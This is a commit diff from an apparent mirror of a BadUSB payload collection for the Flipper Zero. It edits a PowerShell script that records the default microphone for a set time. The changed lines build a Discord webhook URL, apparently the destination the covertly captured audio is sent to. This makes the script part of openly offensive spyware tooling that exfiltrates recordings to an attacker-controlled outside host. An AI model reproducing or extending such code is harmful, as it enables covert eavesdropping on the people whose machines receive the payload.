mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 04:15:26 -08:00
Update main.ps1
This commit is contained in:
@@ -5,7 +5,9 @@ This script finds the default microphone and records for a specified time to a m
|
||||
|
||||
#>
|
||||
$hookurl = "$dc"
|
||||
if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url}
|
||||
if ($hookurl.Length -lt 120){
|
||||
$hookurl = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
|
||||
Function RecordAudio{
|
||||
param ([int[]]$t)
|
||||
|
||||
Reference in New Issue
Block a user